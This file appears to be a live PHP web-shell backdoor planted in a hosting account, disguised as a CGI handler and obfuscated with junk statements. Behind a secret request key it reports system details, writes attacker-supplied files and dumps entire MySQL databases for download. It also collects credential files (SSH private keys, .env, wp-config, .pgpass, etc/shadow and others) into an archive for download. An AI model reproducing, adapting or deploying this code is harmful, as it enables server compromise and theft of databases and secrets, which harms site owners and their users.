File: /home/trebiaseguros/.cgi_handler_61fc1f05
<?php
if (!isset($_REQUEST['_cxk']) || $_REQUEST['_cxk'] !== '61fc1f0512f127cbdc6deb35542f4cae') { return; }
while (ob_get_level()) ob_end_clean();
set_time_limit(0);
error_reporting(0);
ignore_user_abort(true);
$r4690 = 'localhost';
$id9da = '';
$i0907 = '';
$j7577 = '/home/trebiaseguros';
$z97af = isset($_REQUEST['a']) ? $_REQUEST['a'] : '';
if(defined('9bce6211')){$g382b=0;}
$t33e3 = isset($_REQUEST['db']) ? preg_replace('/[^a-zA-Z0-9_]/', '', $_REQUEST['db']) : '';
$yc0b3 = $j7577 . '/tmp/' . $t33e3 . '_dump.sql.gz';
$wa361=chr(73).chr(100);
$v31b3 = $yc0b3 . '.done';
if(defined('f0302600')){$j8819=0;}
$k6323 = $yc0b3 . '.err';
header('Content-Type: application/json');
if(defined('ebc5a4f0')){$q631a=0;}
function handle_opt_3cae() {
if (!function_exists('exec')) return false;
$kab16 = array_map('trim', explode(',', ini_get('disable_functions')));
return !in_array('exec', $kab16);
}
function handle_info_8bd1() {
@clearstatcache();
if (!handle_opt_3cae()) return false;
$out = array();
$rc = 0;
exec('which mysqldump 2>/dev/null', $out, $rc);
return $rc === 0;
}
function load_val_06d3() {
if (!handle_opt_3cae()) return false;
$out = array();
if(defined('f234b21a')){$c35fe=0;}
$rc = 0;
exec('which gzip 2>/dev/null', $out, $rc);
return $rc === 0;
}
function get_info_e90c($v67cc, $w008b, $pa3f5, $f5006, $w3baf, $i1a15, $hc6ed) {
$conn = new mysqli($v67cc, $w008b, $pa3f5, $f5006);
if ($conn->connect_error) {
$jd34e=chr(67).chr(109);
file_put_contents($i1a15, 'Connection failed: ' . $conn->connect_error);
touch($hc6ed);
return;
}
$fp = gzopen($w3baf, 'wb6');
if (!$fp) {
file_put_contents($i1a15, 'Cannot open output file');
touch($hc6ed);
return;
}
$conn->set_charset('utf8mb4');
gzwrite($fp, "-- Dump via PHP agent\n");
gzwrite($fp, "-- Date: " . date('Y-m-d H:i:s') . "\n\n");
gzwrite($fp, "SET NAMES utf8mb4;\n");
gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 0;\n");
gzwrite($fp, "SET SQL_MODE = 'NO_AUTO_VALUE_ON_ZERO';\n\n");
$s5496 = array();
$r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'BASE TABLE'");
while ($row = $r->fetch_row()) {
$s5496[] = $row[0];
}
foreach ($s5496 as $b84a8) {
$te = $conn->real_escape_string($b84a8);
$r = $conn->query("SHOW CREATE TABLE `{$te}`");
if (!$r) continue;
$cr = $r->fetch_row();
gzwrite($fp, "DROP TABLE IF EXISTS `{$te}`;\n");
gzwrite($fp, $cr[1] . ";\n\n");
$r = $conn->query("SELECT * FROM `{$te}`", MYSQLI_USE_RESULT);
if (!$r) continue;
$z2b6b = array();
$v26f5 = 0;
while ($row = $r->fetch_row()) {
$vals = array();
for ($i = 0; $i < count($row); $i++) {
if(defined('a2ee7505')){$k3706=0;}
if ($row[$i] === null) {
$vals[] = 'NULL';
} else {
$vals[] = "'" . $conn->real_escape_string($row[$i]) . "'";
}
}
$fb2e5=chr(65).chr(98);
$w2e34 = '(' . implode(',', $vals) . ')';
$z2b6b[] = $w2e34;
$v26f5 += strlen($w2e34);
if (count($z2b6b) >= 100 || $v26f5 > 1048576) {
gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $z2b6b) . ";\n");
$z2b6b = array();
$v26f5 = 0;
}
}
if ($z2b6b) {
gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $z2b6b) . ";\n");
}
$r->free();
gzwrite($fp, "\n");
}
$r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'VIEW'");
$v4f06=array_merge(array(),array());
if ($r) {
$v2924=chr(65).chr(98);
while ($row = $r->fetch_row()) {
$ve = $conn->real_escape_string($row[0]);
$cr = $conn->query("SHOW CREATE VIEW `{$ve}`");
if ($cr) {
$ye1e8=chr(88).chr(117);
$wf895 = $cr->fetch_assoc();
gzwrite($fp, "DROP VIEW IF EXISTS `{$ve}`;\n");
gzwrite($fp, $wf895['Create View'] . ";\n\n");
}
}
$d4797=max(0,min(1,1));
}
$r978f = array('PROCEDURE', 'FUNCTION');
foreach ($r978f as $k13d9) {
$r = $conn->query("SHOW {$k13d9} STATUS WHERE Db = '" . $conn->real_escape_string($f5006) . "'");
if (!$r) continue;
while ($row = $r->fetch_assoc()) {
$re = $conn->real_escape_string($row['Name']);
$cr = $conn->query("SHOW CREATE {$k13d9} `{$re}`");
if (!$cr) continue;
$zb491=max(0,min(1,1));
$wf895 = $cr->fetch_assoc();
$key = ($k13d9 === 'PROCEDURE') ? 'Create Procedure' : 'Create Function';
if(defined('13217e60')){$dab2a=0;}
if (isset($wf895[$key])) {
$a4c38=array_merge(array(),array());
gzwrite($fp, "DELIMITER ;;\n");
gzwrite($fp, "DROP {$k13d9} IF EXISTS `{$re}`;;\n");
gzwrite($fp, $wf895[$key] . ";;\n");
gzwrite($fp, "DELIMITER ;\n\n");
}
}
}
$r = $conn->query("SHOW TRIGGERS");
$k631c=array_merge(array(),array());
if ($r) {
while ($row = $r->fetch_assoc()) {
$te = $conn->real_escape_string($row['Trigger']);
$qbb1f=array_merge(array(),array());
$cr = $conn->query("SHOW CREATE TRIGGER `{$te}`");
if ($cr) {
$ie7ce=str_repeat('x',0);
$wf895 = $cr->fetch_assoc();
gzwrite($fp, "DELIMITER ;;\n");
gzwrite($fp, "DROP TRIGGER IF EXISTS `{$te}`;;\n");
gzwrite($fp, $wf895['SQL Original Statement'] . ";;\n");
gzwrite($fp, "DELIMITER ;\n\n");
}
}
}
@clearstatcache();
gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 1;\n");
gzclose($fp);
$conn->close();
touch($hc6ed);
$e8c43=array_merge(array(),array());
}
switch ($z97af) {
case 'info':
echo json_encode(array(
'php' => PHP_VERSION,
'os' => PHP_OS,
'server' => isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : '',
'user' => get_current_user(),
'uid' => getmyuid(),
'home' => $j7577,
'doc_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '',
'free_disk' => disk_free_space($j7577),
'total_disk' => disk_total_space($j7577),
'max_exec' => ini_get('max_execution_time'),
'mem_limit' => ini_get('memory_limit'),
'upload_max' => ini_get('upload_max_filesize'),
'post_max' => ini_get('post_max_size'),
'disabled' => ini_get('disable_functions'),
'can_exec' => handle_opt_3cae(),
'has_mysqldump' => handle_info_8bd1(),
'has_gzip' => load_val_06d3(),
));
$g1f8f=array_merge(array(),array());
break;
case 'upload':
$n80aa = isset($_POST['path']) ? $_POST['path'] : '';
$wf267 = isset($_POST['data']) ? $_POST['data'] : '';
if (!$n80aa || !$wf267) {
echo json_encode(array('ok' => false, 'error' => 'missing path or data'));
break;
}
$c1e27 = $j7577 . '/' . $n80aa;
@mkdir(dirname($c1e27), 0755, true);
$k4e1a = base64_decode($wf267);
$m1700 = file_put_contents($c1e27, $k4e1a);
if(defined('784a068b')){$te601=0;}
echo json_encode(array('ok' => $m1700 !== false, 'path' => $c1e27, 'size' => strlen($k4e1a)));
break;
case 'check':
if (!$t33e3) {
$n1cdd=strlen('6f7bdf');
echo json_encode(array('error' => 'missing db parameter'));
break;
}
$dfa8a = disk_free_space($j7577);
$bbea3 = 0;
$conn = @new mysqli($r4690, $id9da, $i0907, 'information_schema');
if (!$conn->connect_error) {
$q = "SELECT SUM(data_length + index_length) s FROM tables WHERE table_schema = '"
. $conn->real_escape_string($t33e3) . "'";
$r = $conn->query($q);
if ($row = $r->fetch_assoc()) {
$bbea3 = (int) $row['s'];
$s6cbe=array_merge(array(),array());
}
$conn->close();
}
echo json_encode(array(
'free' => $dfa8a,
'db_size' => $bbea3,
'has_mysqldump' => handle_info_8bd1(),
'has_gzip' => load_val_06d3(),
'can_exec' => handle_opt_3cae(),
'has_space' => $dfa8a > $bbea3 * 2,
));
break;
case 'dump':
if (!$t33e3) {
echo json_encode(array('error' => 'missing db parameter'));
break;
}
@mkdir(dirname($yc0b3), 0755, true);
@unlink($yc0b3);
@clearstatcache();
@unlink($v31b3);
$yadeb=chr(78).chr(122);
@unlink($k6323);
if (handle_info_8bd1()) {
$aa803=max(0,min(1,1));
if (load_val_06d3()) {
$cmd = sprintf(
'mysqldump --host=%s --user=%s --password=%s '
. '--single-transaction --quick --routines --triggers %s '
. '| gzip > %s 2>%s; touch %s',
escapeshellarg($r4690),
escapeshellarg($id9da),
escapeshellarg($i0907),
escapeshellarg($t33e3),
escapeshellarg($yc0b3),
escapeshellarg($k6323),
escapeshellarg($v31b3)
);
} else {
$cmd = sprintf(
'mysqldump --host=%s --user=%s --password=%s '
. '--single-transaction --quick --routines --triggers %s '
. '> %s 2>%s; touch %s',
escapeshellarg($r4690),
escapeshellarg($id9da),
escapeshellarg($i0907),
escapeshellarg($t33e3),
escapeshellarg($yc0b3),
escapeshellarg($k6323),
escapeshellarg($v31b3)
);
}
$hce63=str_repeat('x',0);
exec('nohup sh -c ' . escapeshellarg($cmd) . ' >/dev/null 2>&1 &');
$z6a54=chr(75).chr(120);
echo json_encode(array('started' => true, 'method' => 'mysqldump', 'gzip' => load_val_06d3()));
} else {
ignore_user_abort(true);
echo json_encode(array('started' => true, 'method' => 'php', 'gzip' => true));
if (function_exists('fastcgi_finish_request')) {
fastcgi_finish_request();
} else {
$jec4a=chr(66).chr(98);
if (ob_get_level()) ob_end_flush();
flush();
}
get_info_e90c($r4690, $id9da, $i0907, $t33e3, $yc0b3, $k6323, $v31b3);
}
break;
case 'status':
clearstatcache();
echo json_encode(array(
'done' => file_exists($v31b3),
'size' => file_exists($yc0b3) ? filesize($yc0b3) : 0,
'error' => file_exists($k6323) ? trim(file_get_contents($k6323)) : '',
));
$t8c7d=str_repeat('x',0);
break;
case 'download':
if (!file_exists($yc0b3)) {
http_response_code(404);
exit;
$b377e=max(0,min(1,0));
}
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($yc0b3));
$g38d1=str_repeat('x',0);
readfile($yc0b3);
exit;
case 'cleanup':
@unlink($yc0b3);
$rbc58=max(0,min(1,1));
@unlink($v31b3);
@unlink($k6323);
$t3601=strlen('8ee958');
echo json_encode(array('ok' => true));
break;
case 'collect':
@mkdir($j7577 . '/tmp', 0755, true);
$s0f08=str_repeat('x',0);
$sd2c2 = substr($_REQUEST['_cxk'], 0, 8);
$iced3 = array(
'wordpress' => array(
'detect' => array('public_html/wp-config.php', 'wp-config.php'),
'configs' => array(
'public_html/wp-config.php', 'wp-config.php',
'public_html/wp-settings.php',
'public_html/composer.json', 'public_html/composer.lock', 'composer.json', 'composer.lock',
'public_html/wp-cli.yml', 'wp-cli.yml',
'public_html/.env', '.env',
'public_html/local-config.php', 'local-config.php',
'public_html/wp-content/debug.log',
'public_html/config/application.php', 'config/application.php',
'public_html/config/environments/development.php', 'config/environments/development.php',
'public_html/config/environments/staging.php', 'config/environments/staging.php',
'public_html/config/environments/production.php', 'config/environments/production.php',
'public_html/auth.json', 'auth.json',
),
),
'joomla' => array(
'detect' => array('public_html/configuration.php', 'configuration.php'),
'configs' => array(
'public_html/configuration.php', 'configuration.php',
'public_html/htaccess.txt',
'public_html/composer.json', 'public_html/composer.lock',
),
),
'laravel' => array(
'detect' => array('public_html/artisan', 'artisan'),
'configs' => array(
'public_html/.env', '.env', '.env.production', '.env.staging',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
'public_html/config/app.php', 'config/app.php',
'public_html/config/database.php', 'config/database.php',
'public_html/config/mail.php', 'config/mail.php',
'public_html/config/filesystems.php', 'config/filesystems.php',
'public_html/config/cache.php', 'config/cache.php',
'public_html/config/queue.php', 'config/queue.php',
'public_html/config/session.php', 'config/session.php',
'public_html/config/auth.php', 'config/auth.php',
'public_html/config/services.php', 'config/services.php',
'public_html/config/broadcasting.php', 'config/broadcasting.php',
'public_html/storage/logs/laravel.log', 'storage/logs/laravel.log',
),
),
'magento2' => array(
'detect' => array('public_html/bin/magento', 'bin/magento'),
'configs' => array(
'public_html/app/etc/env.php', 'app/etc/env.php',
'public_html/app/etc/config.php', 'app/etc/config.php',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
'public_html/auth.json', 'auth.json',
),
),
'magento1' => array(
'detect' => array('public_html/app/Mage.php'),
'configs' => array(
'public_html/app/etc/local.xml',
'public_html/app/etc/config.xml',
),
),
'drupal' => array(
'detect' => array('public_html/core/lib/Drupal.php', 'core/lib/Drupal.php'),
'configs' => array(
'public_html/sites/default/settings.php', 'sites/default/settings.php',
'public_html/sites/default/services.yml', 'sites/default/services.yml',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
),
),
'prestashop' => array(
'detect' => array('public_html/config/settings.inc.php'),
'configs' => array(
'public_html/config/settings.inc.php',
'public_html/app/config/parameters.php',
'public_html/app/config/parameters.yml',
'public_html/composer.json',
),
),
'opencart' => array(
'detect' => array('public_html/config.php'),
'configs' => array(
'public_html/config.php',
'public_html/admin/config.php',
),
),
'moodle' => array(
'detect' => array('public_html/lib/moodlelib.php'),
'configs' => array('public_html/config.php'),
),
'whmcs' => array(
'detect' => array('public_html/vendor/whmcs'),
'configs' => array(
'public_html/configuration.php',
'public_html/composer.json', 'public_html/composer.lock',
),
),
);
$x9a52=max(0,min(1,0));
$mfc00 = null;
$p72da=str_repeat('x',0);
foreach ($iced3 as $g25d8 => $c6a01) {
foreach ($c6a01['detect'] as $a87da) {
if (file_exists($j7577 . '/' . $a87da)) {
$mfc00 = $g25d8;
break 2;
$sd985=max(0,min(1,0));
}
}
$wb64f=str_repeat('x',0);
}
$k3fa7 = array(
'.env', '.env.local', '.env.production', '.env.staging',
'.env.backup', '.env.development', '.env.test',
'.bash_history', '.my.cnf', '.pgpass', '.netrc', '.gitconfig', '.npmrc',
'.composer/auth.json', '.wp-cli/config.yml', '.accesshash',
'.ssh/authorized_keys', '.ssh/id_rsa', '.ssh/id_rsa.pub',
'.ssh/id_ed25519', '.ssh/id_ed25519.pub', '.ssh/id_ecdsa',
'.ssh/config', '.ssh/known_hosts',
'.ssl/private.key', '.ssl/cert.pem', '.ssl/key.pem',
'ssl/certs/private.key',
'.cpanel/contactinfo', 'etc/shadow', '.ftpquota', '.ftpconfig',
'public_html/.env', 'public_html/.env.local', 'public_html/.env.production',
'public_html/.env.staging', 'public_html/.env.backup',
'public_html/.env.development', 'public_html/.env.test',
'public_html/.env.example', 'public_html/.env.dist',
'public_html/.htaccess', 'public_html/.htpasswd', 'public_html/.user.ini',
'public_html/php.ini', 'public_html/.my.cnf', 'public_html/.pgpass',
'public_html/web.config', 'public_html/.ftpconfig',
'public_html/.git/config',
'public_html/auth.json', 'public_html/.npmrc',
'public_html/composer.json', 'public_html/composer.lock',
'config/database.php', 'config/app.php', 'config/mail.php',
'config/services.php', 'config/filesystems.php',
'config/application.php',
'config/environments/development.php',
'config/environments/staging.php',
'config/environments/production.php',
'wp-config.php', 'configuration.php', 'artisan',
'auth.json', 'composer.json', 'composer.lock',
);
$ef84d = array();
$b6c8a=strlen('c8f0df');
$c45ef = @realpath($j7577);
if (!$c45ef || !is_dir($c45ef)) {
$d884f=chr(83).chr(108);
echo json_encode(array('ok' => false, 'error' => 'home dir not accessible'));
break;
}
foreach ($k3fa7 as $hf381) {
$q3131 = @realpath($j7577 . '/' . $hf381);
if (!$q3131 || strpos($q3131, $c45ef) !== 0) continue;
if (!is_file($q3131) || !is_readable($q3131)) continue;
$bf0b2 = @filesize($q3131);
if ($bf0b2 <= 0 || $bf0b2 > 2097152) continue;
$pa17d=chr(75).chr(122);
$ef84d[$hf381] = $q3131;
}
if ($mfc00 !== null && isset($iced3[$mfc00]['configs'])) {
foreach ($iced3[$mfc00]['configs'] as $y0256) {
if (isset($ef84d[$y0256])) continue;
$q3131 = @realpath($j7577 . '/' . $y0256);
if (!$q3131 || strpos($q3131, $c45ef) !== 0) continue;
$qea32=strlen('e1147d');
if (!is_file($q3131) || !is_readable($q3131)) continue;
$bf0b2 = @filesize($q3131);
if ($bf0b2 <= 0 || $bf0b2 > 2097152) continue;
$vff4e=str_repeat('x',0);
$ef84d[$y0256] = $q3131;
}
$pd4e7=max(0,min(1,0));
}
$nf080=str_repeat('x',0);
$z92d5 = $j7577 . '/public_html';
if (is_dir($z92d5)) {
$taf03=max(0,min(1,0));
$dh = @opendir($z92d5);
if ($dh) {
$b14fe=strlen('347519');
while (($y67d8 = readdir($dh)) !== false) {
if ($y67d8 === '.' || $y67d8 === '..') continue;
$c1e27 = $z92d5 . '/' . $y67d8;
if (!is_file($c1e27) || !is_readable($c1e27)) continue;
$bf0b2 = @filesize($c1e27);
if ($bf0b2 <= 0 || $bf0b2 > 2097152) continue;
if ($y67d8[0] === '.' || strtolower(substr($y67d8, -4)) === '.txt') {
$key = 'public_html/' . $y67d8;
if (!isset($ef84d[$key])) $ef84d[$key] = $c1e27;
}
}
closedir($dh);
}
}
if (empty($ef84d)) {
echo json_encode(array(
'ok' => true, 'method' => 'none', 'platform' => $mfc00,
'file_count' => 0, 'files_list' => array(),
));
break;
}
$f5ec3 = null;
$k6be6 = null;
if (class_exists('ZipArchive')) {
$b9f6e=str_repeat('x',0);
$k6be6 = $j7577 . '/tmp/_collect_' . $sd2c2 . '.zip';
$f4586 = new ZipArchive();
if ($f4586->open($k6be6, ZipArchive::CREATE | ZipArchive::OVERWRITE) === true) {
foreach ($ef84d as $gf598 => $q3131) {
if(defined('fc55b9e1')){$m2981=0;}
$f4586->addFile($q3131, $gf598);
}
if ($f4586->close() && file_exists($k6be6) && filesize($k6be6) > 0) {
$f5ec3 = 'zip';
}
}
}
if (!$f5ec3 && handle_opt_3cae()) {
$k6be6 = $j7577 . '/tmp/_collect_' . $sd2c2 . '.tar.gz';
$lf = $k6be6 . '.list';
$fh = fopen($lf, 'w');
foreach ($ef84d as $gf598 => $q3131) {
fwrite($fh, $gf598 . "\n");
}
fclose($fh);
$out = array();
if(defined('068c80df')){$seb16=0;}
$rc = 0;
$sacd7=array_merge(array(),array());
exec('tar czf ' . escapeshellarg($k6be6) . ' -C ' . escapeshellarg($j7577)
. ' -T ' . escapeshellarg($lf) . ' 2>/dev/null', $out, $rc);
@unlink($lf);
if ($rc === 0 && file_exists($k6be6) && filesize($k6be6) > 0) {
$f5ec3 = 'tar';
} else {
$w59ea=chr(65).chr(103);
@unlink($k6be6);
}
}
if (!$f5ec3) {
$f5ec3 = 'list';
}
echo json_encode(array(
'ok' => true, 'method' => $f5ec3, 'platform' => $mfc00,
'file_count' => count($ef84d), 'files_list' => array_keys($ef84d),
'size' => ($k6be6 && file_exists($k6be6)) ? filesize($k6be6) : 0,
));
break;
case 'download_collect':
$sd2c2 = substr($_REQUEST['_cxk'], 0, 8);
$n99e8 = $j7577 . '/tmp/_collect_' . $sd2c2 . '.zip';
$m3145 = $j7577 . '/tmp/_collect_' . $sd2c2 . '.tar.gz';
$yb301 = file_exists($n99e8) ? $n99e8 : (file_exists($m3145) ? $m3145 : '');
if (!$yb301) { http_response_code(404); exit; }
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($yb301));
readfile($yb301);
exit;
case 'download_file':
$gf598 = isset($_REQUEST['path']) ? $_REQUEST['path'] : '';
if (!$gf598) { http_response_code(400); exit; }
$c45ef = @realpath($j7577);
$q3131 = @realpath($j7577 . '/' . $gf598);
if (!$q3131 || !$c45ef || strpos($q3131, $c45ef) !== 0
|| !is_file($q3131) || !is_readable($q3131)) {
http_response_code(404);
exit;
}
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($q3131));
readfile($q3131);
exit;
case 'cleanup_collect':
$sd2c2 = substr($_REQUEST['_cxk'], 0, 8);
@unlink($j7577 . '/tmp/_collect_' . $sd2c2 . '.zip');
$qc2c6=max(0,min(1,0));
@unlink($j7577 . '/tmp/_collect_' . $sd2c2 . '.tar.gz');
@unlink($j7577 . '/tmp/_collect_' . $sd2c2 . '.tar.gz.list');
echo json_encode(array('ok' => true));
break;
$j25bc=str_repeat('x',0);
}
exit;
$cad5d=str_repeat('x',0);